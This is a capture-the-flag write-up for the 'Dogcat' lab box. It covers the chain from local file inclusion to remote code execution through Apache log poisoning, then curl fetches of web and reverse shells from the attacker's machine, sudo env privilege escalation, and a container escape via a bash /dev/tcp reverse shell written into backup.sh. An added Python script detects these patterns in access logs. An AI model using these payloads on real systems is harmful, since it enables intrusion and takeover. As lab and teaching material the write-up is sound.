🟠Dogcat
Description:
I made a website where you can look at pictures of dogs and/or cats!
Enumeration
NMAP
nmap -sCSV -O
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 09:02 EDT
Nmap scan report for 10.10.74.124
Host is up (0.72s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
| 256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_ 256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
Two doors are open:
80 running Apache 2.4.38
22 running OpenSSH
Website
by clicking on "A dog"

by clicking on "A cat"

By analyzing the URL, we can try to request files other than the expected ones, for example:

"Sorry, only dogs or cats are allowed."
This message suggests that the system checks whether the value passed in the URL contains "cat" or "dog".
To bypass this we can use cat/../
That is, we step into the "cats" folder, leave it again and end up back where we were, but the URL still contains "cat" and so passes the check.

Does it work?
It tried to include index.php and showed an error, but the check was bypassed.
LFI
Local File Inclusion
We can read .php files from the server.
Trying to read files with other extensions gives this error:

"passwd.php"
The system adds the .php extension by default.
We can read index.php itself without errors by encoding it in base64 with the php://filter wrapper:
view=php://filter/convert.base64-encode/resource=cat/../index

Decoding this base64 gives the index.php source code, which shows how the include works:

Here we can see that the system only appends the extension when "ext" is not defined.
So we can read any file by supplying an empty "ext".
Example, reading /etc/passwd:
/?view=cat/../../../../../../../../etc/passwd&ext=

RCE
(Remote Code Execution)
In this case we were able to escalate from LFI to RCE by reading the log files.
To read the apache2 access log:
/?view=cat/../../../../../../../../var/log/apache2/access.log&ext=

Now, if we inject PHP code into the log, it will be executed when the log is included, which gives us RCE.
To do this I will use a proxy called Burp Suite to intercept the request and inject the code in place of the User-Agent header.
Writing a shell:
<?php echo system($_GET['cmd']); ?>

Refreshing and viewing the source code:

It works!
Now we can run commands from the URL using &cmd=
view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=ls
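As an added example (not part of the original writeup), the following Python script scans Apache access log lines for the patterns used in the LFI and log-poisoning steps above: traversal in the view parameter, php:// stream wrappers, an empty ext parameter, and PHP tags in client-controlled headers. The log lines are constructed samples, not traffic captured from the box.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache "combined" format (not real traffic from the box).
SAMPLE_LOG = """\
10.0.0.5 - - [27/Oct/2020:09:10:01 -0400] "GET /?view=cat HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Oct/2020:09:11:07 -0400] "GET /?view=php://filter/convert.base64-encode/resource=cat/../index HTTP/1.1" 200 2048 "-" "curl/7.68.0"
10.0.0.9 - - [27/Oct/2020:09:12:30 -0400] "GET /?view=cat/../../../../../../../../etc/passwd&ext= HTTP/1.1" 200 1400 "-" "curl/7.68.0"
10.0.0.9 - - [27/Oct/2020:09:13:45 -0400] "GET /?view=cat HTTP/1.1" 200 512 "-" "<?php echo system($_GET['cmd']); ?>"
"""

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify(line):
    """Return (ip, findings) for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    qs = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    # Decode once more so a double-encoded "%252e%252e" does not slip past the check.
    view = unquote(qs.get("view", [""])[0]).replace("\\", "/")
    findings = []
    if ".." in view.split("/"):
        findings.append("path traversal in view")
    if re.match(r"[a-z0-9.+-]+://", view, re.IGNORECASE):
        findings.append("stream wrapper in view")
    if qs.get("ext") == [""]:
        findings.append("empty ext parameter (extension check bypass)")
    # Log poisoning: PHP tags in a header that Apache writes into access.log.
    if "<?" in m["ua"] or "<?" in m["referer"]:
        findings.append("PHP tag in client-controlled header (log poisoning)")
    return m["ip"], findings


def scan(log_text):
    """Return one (ip, findings) tuple for every line that triggered at least one rule."""
    hits = []
    for line in log_text.splitlines():
        result = classify(line)
        if result is not None and result[1]:
            hits.append(result)
    return hits


if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, "->", "; ".join(findings))
```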

First flag
view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=cat+flag.php

Web Shell
To see what we can use to get a web shell, we can list the machine's binaries:
view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=ls+/usr/bin

I will use curl to fetch a shell from my machine.
On our machine:
Installing the p0wny shell:
wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O powny.php
sudo python3 -m http.server 80
Now I will download the file onto the box and put it in /var/www/html.
On the box (via the RCE):
view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=curl <your_ip>/powny.php -o /var/www/html/powny.php

It works.
Second flag

Reverse Shell
We will use php-reverse-shell from pentestmonkey.
On our machine:
Installing the reverse shell:
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
(use nano or vim to change the IP and port)
sudo python3 -m http.server 80

In the web shell:
curl <your_ip>/php-reverse-shell.php -o /var/www/html/shell.php

And now just browse to:
/shell.php


Privilege Escalation
cd /tmp/
Installing linpeas
On our machine (serving linpeas.sh):
sudo python3 -m http.server 80
In the reverse shell:
curl <your_ip>/linpeas.sh -o /tmp/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh > output.txt &
Reading the output:
cat output.txt
linpeas flagged this binary (/usr/bin/env) as a 99% chance of being vulnerable to privilege escalation.
Checking GTFOBins for this binary:

sudo env /bin/sh
Third flag
Privilege escalation escalation?
As root, in the root (/) of the filesystem we see:

which shows that we are running inside a Docker container, so we have to do a "container escape".
So, searching for scripts:
find / -type f -name "*.sh"
we find: /opt/backups/backup.sh

This script compresses files from outside the container, so I will replace it with a reverse shell, which will be called from outside the container as well:
echo '#!/bin/bash' > /opt/backups/backup.sh
echo 'bash -i >& /dev/tcp//1234 0>&1' >> /opt/backups/backup.sh
And just wait.
A few minutes later:

Fourth flag
